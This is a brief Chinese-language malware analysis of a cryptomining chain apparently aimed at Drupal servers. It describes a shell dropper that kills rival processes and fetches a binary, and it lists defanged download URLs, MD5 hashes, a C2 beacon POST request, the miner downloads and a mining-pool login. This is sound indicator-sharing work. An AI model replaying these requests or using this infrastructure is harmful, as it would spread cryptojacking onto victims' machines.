ups.sh

• downloader: hxxp://164.132.159.56/drupal/ups.sh
• md5: 3dc00f7c2745bd791d7c7a7cfd9bea24
• 检查进程antd是否存在，如果antd存在，退出脚本运行
• 杀死command以'./'开头的所有进程
• 杀死perl进程
• 杀死名为6f47*的进程
• 下载hxxp://164.132.159.56/drupal/2/prcsv，命名为antd，并执行

antd

• downloader: hxxp://164.132.159.56/drupal/2/prcsv
• md5: a3420cd460e4188d281466dbbd4c36df
• 上报设备信息：

POST /drupal/__dp.php HTTP/1.0
Host: 164.132.159.56
Content-Type: application/x-www-form-urlencoded
Content-length: 38

cf=1&h=debian-amd64&c=1

• 下载矿机挖矿：

md5=a1ebf0dabd050dcaf2852dc4c603c201	uri=hxxp://80.240.26.52:80/d/srd 
md5=69f7f14d572aea08991ce5f912a260be	uri=hxxp://80.240.26.52:80/d/lmmml
md5=5837ba0c00af258f948068c5335d64eb	uri=hxxp://80.240.26.52:80/d/vlb

• 挖矿配置

矿池： 95.179.153.229:80
登录信息：
{"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"x","pass":"x","agent":"apt-get","algo":["cn/1","cn/0","cn/xtl","cn/msr","cn"]}}